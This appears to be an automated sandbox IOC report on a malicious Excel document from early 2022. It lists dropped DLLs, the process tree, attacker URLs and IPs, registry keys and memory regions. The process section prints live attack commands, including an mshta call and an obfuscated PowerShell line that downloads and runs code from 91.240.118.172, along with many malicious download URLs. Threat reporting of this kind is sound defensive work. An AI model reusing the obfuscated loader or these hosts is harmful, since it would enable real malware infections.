IOC Report

loading gif

Files

File Path
Type
Category
Malicious
CJ68000754184.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
initial sample
malicious
C:\ProgramData\JooSee.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\CJ68000754184.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\476C.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DFBED7E8D1868A8AC5.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFD084F18BE955AE17.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9HHY8DPM6GW1G0VNKTXL.temp
data
dropped
C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.172/gg/ff/fe.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
malicious
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://maxtdeveloper.com/okw9yx/
unknown
malicious
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
unknown
malicious
http://it-o.biz/bitrix/xoDdDe/PE3
unknown
malicious
http://www.inablr.com/elenctic/f
unknown
malicious
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
unknown
malicious
http://hostfeeling.com/wp-admin/
unknown
malicious
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
unknown
malicious
https://property-eg.com/mlzkir/97v/
unknown
malicious
http://91.240.11
unknown
malicious
http://91.240.118.172/gg/ff/fe.png
91.240.118.172
malicious
http://91.240.118.172/gg/ff/fe.pngPE3
unknown
malicious
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
unknown
malicious
http://bimesarayenovin.ir/wp-adm
unknown
malicious
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
unknown
malicious
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
unknown
malicious
http://hostfeeling.com
unknown
malicious
http://daisy.sukoburu-secure.com
unknown
malicious
http://jurnalpjf.lan.go.id/assets/iM/
103.206.244.105
malicious
http://activetraining.sytes.net/
unknown
malicious
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
unknown
malicious
https://gudangtasorichina.com/wp-content/GG01c/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlngs
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlb
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmld
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlmshta
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlWinSta0
unknown
malicious
http://91.240.118.172/gg/ff/fe.html_
unknown
malicious
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
unknown
malicious
https://property-eg.com/mlzkir/97v/PE3
unknown
malicious
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
unknown
malicious
https://property-eg.com/mlzkir/9
unknown
malicious
http://91.240.118.172
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmll
unknown
malicious
http://activetraining.sytes.net/libraries/8s/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlfunction
unknown
malicious
http://maxtdeveloper.com/okw9yx/Gc28ZX/
unknown
malicious
http://it-o.biz/bitrix/xoDdDe/
unknown
malicious
https://gudangtasorichina.com/wp-content/GG01c/
unknown
malicious
http://totalplaytuxtla.com/sitio/DgktL3zd/
unknown
malicious
http://activetraining.sytes.net/libraries/8s/
unknown
malicious
http://gardeningfilm.com/wp-cont
unknown
malicious
http://jurnalpjf.lan.go.id/assets/iM/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlB
unknown
malicious
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
unknown
malicious
http://bimesarayenovin.ir/wp-admin/G1pYGL/
unknown
malicious
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.html
91.240.118.172
malicious
http://www.protware.com/ll
unknown
http://www.protware.com/
unknown
http://jurnalpjf.lan.go.id/asset
unknown
http://it-o.biz/
unknown
https://gudangtasorichina.com/wp
unknown
http://daisy.suk
unknown
http://jurnalpjf.lan.go.id
unknown
http://www.protware.com
unknown
http://www.protware.comP
unknown
http://totalplaytuxtla.com/sitio
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://91.240.118.172/gg/ff/fe.p
unknown
http://www.piriform.com/ccleaner
unknown
http://www.protware.com/r
unknown
http://www.piriform.com/ccleanerhttp://w
unknown
There are 53 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
hostfeeling.com
164.90.147.135
malicious
jurnalpjf.lan.go.id
103.206.244.105

IPs

IP
Domain
Country
Malicious
195.154.133.20
unknown
France
malicious
185.157.82.211
unknown
Poland
malicious
212.237.17.99
unknown
Italy
malicious
79.172.212.216
unknown
Hungary
malicious
110.232.117.186
unknown
Australia
malicious
173.214.173.220
unknown
United States
malicious
212.24.98.99
unknown
Lithuania
malicious
138.185.72.26
unknown
Brazil
malicious
178.63.25.185
unknown
Germany
malicious
160.16.102.168
unknown
Japan
malicious
81.0.236.90
unknown
Czech Republic
malicious
103.75.201.2
unknown
Thailand
malicious
216.158.226.206
unknown
United States
malicious
45.118.115.99
unknown
Indonesia
malicious
51.15.4.22
unknown
France
malicious
159.89.230.105
unknown
United States
malicious
162.214.50.39
unknown
United States
malicious
200.17.134.35
unknown
Brazil
malicious
217.182.143.207
unknown
France
malicious
107.182.225.142
unknown
United States
malicious
51.38.71.0
unknown
France
malicious
45.118.135.203
unknown
Japan
malicious
50.116.54.215
unknown
United States
malicious
131.100.24.231
unknown
Brazil
malicious
46.55.222.11
unknown
Bulgaria
malicious
41.76.108.46
unknown
South Africa
malicious
173.212.193.249
unknown
Germany
malicious
45.176.232.124
unknown
Colombia
malicious
178.79.147.66
unknown
United Kingdom
malicious
212.237.5.209
unknown
Italy
malicious
162.243.175.63
unknown
United States
malicious
176.104.106.96
unknown
Serbia
malicious
207.38.84.195
unknown
United States
malicious
164.68.99.3
unknown
Germany
malicious
164.90.147.135
hostfeeling.com
United States
malicious
192.254.71.210
unknown
United States
malicious
212.237.56.116
unknown
Italy
malicious
104.168.155.129
unknown
United States
malicious
45.142.114.231
unknown
Germany
malicious
203.114.109.124
unknown
Thailand
malicious
209.59.138.75
unknown
United States
malicious
159.8.59.82
unknown
United States
malicious
129.232.188.93
unknown
South Africa
malicious
91.240.118.172
unknown
unknown
malicious
58.227.42.236
unknown
Korea Republic of
malicious
158.69.222.101
unknown
Canada
malicious
104.251.214.46
unknown
United States
malicious
103.206.244.105
jurnalpjf.lan.go.id
Indonesia
There are 38 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
6d-
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2E724
2E724
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
ti-
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34F67
34F67
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3560C
3560C
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 60 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2E40000
unkown
page execute and read and write
malicious
2651000
trusted library allocation
page execute read
malicious
30E0000
trusted library allocation
page execute and read and write
malicious
4B1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
221000
trusted library allocation
page execute read
malicious
3111000
trusted library allocation
page execute read
malicious
391000
trusted library allocation
page execute read
malicious
2130000
trusted library allocation
page execute and read and write
malicious
971000
trusted library allocation
page execute read
malicious
2920000
trusted library allocation
page execute and read and write
malicious
29E1000
trusted library allocation
page execute read
malicious
4A0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
3110000
trusted library allocation
page execute and read and write
malicious
3181000
trusted library allocation
page execute read
malicious
2101000
trusted library allocation
page execute read
malicious
371000
trusted library allocation
page execute read
malicious
2910000
trusted library allocation
page execute and read and write
malicious
2D0000
trusted library allocation
page execute and read and write
malicious
1B1000
trusted library allocation
page execute read
malicious
2871000
trusted library allocation
page execute read
malicious
2410000
trusted library allocation
page execute and read and write
malicious
28E1000
trusted library allocation
page execute read
malicious
180000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
301000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
681000
trusted library allocation
page execute read
malicious
2E71000
unkown
page execute read
malicious
23A1000
trusted library allocation
page execute read
malicious
3F1000
trusted library allocation
page execute read
malicious
27B1000
trusted library allocation
page execute read
malicious
4B0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
340000
trusted library allocation
page execute and read and write
malicious
A00000
trusted library allocation
page execute and read and write
malicious
2E11000
trusted library allocation
page execute read
malicious
1B0000
trusted library allocation
page execute and read and write
malicious
2791000
trusted library allocation
page execute read
malicious
2C0000
trusted library allocation
page execute and read and write
malicious
2DE0000
trusted library allocation
page execute and read and write
malicious
480000
trusted library allocation
page execute and read and write
malicious
2370000
trusted library allocation
page execute and read and write
malicious
250000
trusted library allocation
page execute and read and write
malicious
940000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2ED1000
trusted library allocation
page execute read
malicious
2730000
trusted library allocation
page execute and read and write
malicious
2870000
trusted library allocation
page execute and read and write
malicious
360000
trusted library allocation
page execute and read and write
malicious
22F1000
trusted library allocation
page execute read
malicious
418D000
trusted library allocation
page read and write
419B000
trusted library allocation
page read and write
3E4000
heap
page read and write
2CC000
heap
page read and write
3E5000
heap
page read and write
260000
heap
page read and write
3578000
trusted library allocation
page read and write
2A04000
trusted library allocation
page read and write
311E000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
3A43000
heap
page read and write
418D000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
357E000
trusted library allocation
page read and write
BBC000
stack
page read and write
44E7000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
5213000
heap
page read and write
2A0000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
1F4000
heap
page read and write
44D0000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
3A7A000
heap
page read and write
2FC5000
trusted library allocation
page read and write
315A000
trusted library allocation
page read and write
3A82000
heap
page read and write
27B3000
trusted library allocation
page read and write
3A93000
heap
page read and write
2BA000
stack
page read and write
2B60000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
32F9000
heap
page read and write
3385000
trusted library allocation
page read and write
10000000
unkown
page readonly
43D000
heap
page read and write
358D000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
305000
heap
page read and write
3AA5000
heap
page read and write
2CE0000
trusted library allocation
page read and write
2F4D000
trusted library allocation
page read and write
12C81000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
3B2000
heap
page read and write
31EA000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
34DB000
stack
page read and write
3385000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
419D000
trusted library allocation
page read and write
10057000
unkown
page read and write
7FF00042000
trusted library allocation
page execute and read and write
44D8000
trusted library allocation
page read and write
2AF2000
trusted library allocation
page read and write
10E000
heap
page read and write
83AE000
trusted library allocation
page read and write
7FF000F0000
trusted library allocation
page read and write
25D000
heap
page read and write
7FF0010A000
trusted library allocation
page execute and read and write
32E3000
trusted library allocation
page read and write
28C0000
trusted library allocation
page read and write
45F000
heap
page read and write
10000
heap
page read and write
3AF0000
heap
page read and write
143000
heap
page read and write
3B4000
heap
page read and write
2EFE000
stack
page read and write
352000
heap
page read and write
292000
heap
page read and write
2CDF000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
3AC2000
heap
page read and write
FC000
stack
page read and write
44D0000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
2F6000
heap
page read and write
10C000
heap
page read and write
359D000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
1F60000
heap
page read and write
2B60000
trusted library allocation
page read and write
32EE000
trusted library allocation
page read and write
328000
heap
page read and write
34F6000
trusted library allocation
page read and write
170000
heap
page read and write
3CB000
heap
page read and write
3385000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
90DE000
trusted library allocation
page read and write
3A19000
heap
page read and write
2B60000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
12C85000
trusted library allocation
page read and write
6D0000
heap
page read and write
3371000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
35B6000
trusted library allocation
page read and write
746000
heap
page read and write
2280000
trusted library allocation
page read and write
3A21000
trusted library allocation
page read and write
2ECE000
stack
page read and write
10C000
heap
page read and write
35A0000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
3E2000
heap
page read and write
3765000
trusted library allocation
page read and write
330000
heap
page read and write
1BAC0000
heap
page read and write
302B000
trusted library allocation
page read and write
5209000
heap
page read and write
2D80000
trusted library allocation
page read and write
3228000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page execute and read and write
39FD000
heap
page read and write
2B67000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
373B000
stack
page read and write
1FC000
stack
page read and write
374E000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
2992000
trusted library allocation
page read and write
2123000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
3B4000
trusted library allocation
page read and write
3AC9000
heap
page read and write
7FF00190000
trusted library allocation
page execute and read and write
900E000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
6A4000
heap
page read and write
418D000
trusted library allocation
page read and write
32D3000
trusted library allocation
page read and write
2650000
trusted library allocation
page read and write
1D4000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2270000
heap
page read and write
41BA000
trusted library allocation
page read and write
39FD000
heap
page read and write
2B4E000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
3D9000
heap
page read and write
200000
trusted library allocation
page read and write
1B750000
heap
page read and write
374E000
trusted library allocation
page read and write
3C1000
heap
page read and write
44E7000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
3A2E000
trusted library allocation
page read and write
39CB000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
4197000
trusted library allocation
page read and write
470000
heap
page read and write
420000
heap
page read and write
32E7000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
29F000
heap
page read and write
26DC000
stack
page read and write
2FE0000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
2E7000
heap
page read and write
32E7000
trusted library allocation
page read and write
508F000
stack
page read and write
3080000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
4D4000
trusted library allocation
page read and write
3A45000
heap
page read and write
218000
heap
page read and write
51D5000
heap
page read and write
39DB000
heap
page read and write
8D9E000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
2BB000
heap
page read and write
30E0000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
3A8C000
heap
page read and write
2B14000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
2ECE000
stack
page read and write
3578000
trusted library allocation
page read and write
2893000
trusted library allocation
page read and write
35A3000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
3A8C000
heap
page read and write
3B2000
heap
page read and write
7FF0026D000
trusted library allocation
page execute and read and write
3375000
trusted library allocation
page read and write
1B350000
heap
page read and write
2210000
heap
page read and write
4192000
trusted library allocation
page read and write
357D000
trusted library allocation
page read and write
3E7000
heap
page read and write
2F13000
trusted library allocation
page read and write
2ECF000
trusted library allocation
page read and write
3A94000
heap
page read and write
3574000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
10000
heap
page read and write
2E0000
heap
page read and write
914E000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
3785000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
3F0000
trusted library allocation
page read and write
5648000
heap
page read and write
351D000
trusted library allocation
page read and write
32EB000
trusted library allocation
page read and write
3AB1000
heap
page read and write
562B000
heap
page read and write
41B8000
trusted library allocation
page read and write
8FDE000
trusted library allocation
page read and write
3567000
trusted library allocation
page read and write
99B000
heap
page read and write
41A1000
trusted library allocation
page read and write
4200000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
1B9A0000
remote allocation
page read and write
414B000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
3565000
trusted library allocation
page read and write
7FF002B0000
trusted library allocation
page execute and read and write
2903000
trusted library allocation
page read and write
27B0000
trusted library allocation
page read and write
3A2B000
heap
page read and write
414B000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
357B000
trusted library allocation
page read and write
30E0000
trusted library allocation
page read and write
3018000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
8CDE000
trusted library allocation
page read and write
877E000
trusted library allocation
page read and write
29DC000
stack
page read and write
2FE7000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
3A8C000
heap
page read and write
4200000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
10000
heap
page read and write
351D000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
32D000
heap
page read and write
10000000
unkown
page readonly
414B000
trusted library allocation
page read and write
3A90000
heap
page read and write
2B58000
trusted library allocation
page read and write
A40000
heap
page read and write
377B000
trusted library allocation
page read and write
39EB000
heap
page read and write
3A0000
heap
page read and write
3AA7000
heap
page read and write
377B000
trusted library allocation
page read and write
3571000
trusted library allocation
page read and write
87CE000
trusted library allocation
page read and write
43D000
heap
page read and write
7685000
heap
page read and write
2B41000
trusted library allocation
page read and write
6A4000
trusted library allocation
page read and write
6BD000
heap
page read and write
1B7D2000
heap
page read and write
2B58000
trusted library allocation
page read and write
390000
heap
page read and write
10046000
unkown
page readonly
377B000
trusted library allocation
page read and write
3A7F000
heap
page read and write
41C2000
trusted library allocation
page read and write
3AA3000
heap
page read and write
377B000
trusted library allocation
page read and write
850000
heap
page read and write
2B65000
trusted library allocation
page read and write
357A000
trusted library allocation
page read and write
3ABA000
heap
page read and write
2280000
trusted library allocation
page read and write
30000
heap
page read and write
3AC9000
heap
page read and write
680000
heap
page read and write
377B000
trusted library allocation
page read and write
3AA9000
heap
page read and write
441000
heap
page read and write
2440000
heap
page read and write
2550000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
298D000
stack
page read and write
2B41000
trusted library allocation
page read and write
2690000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page execute and read and write
441000
heap
page read and write
1D10000
heap
page execute and read and write
447C000
stack
page read and write
2B41000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
2B60000
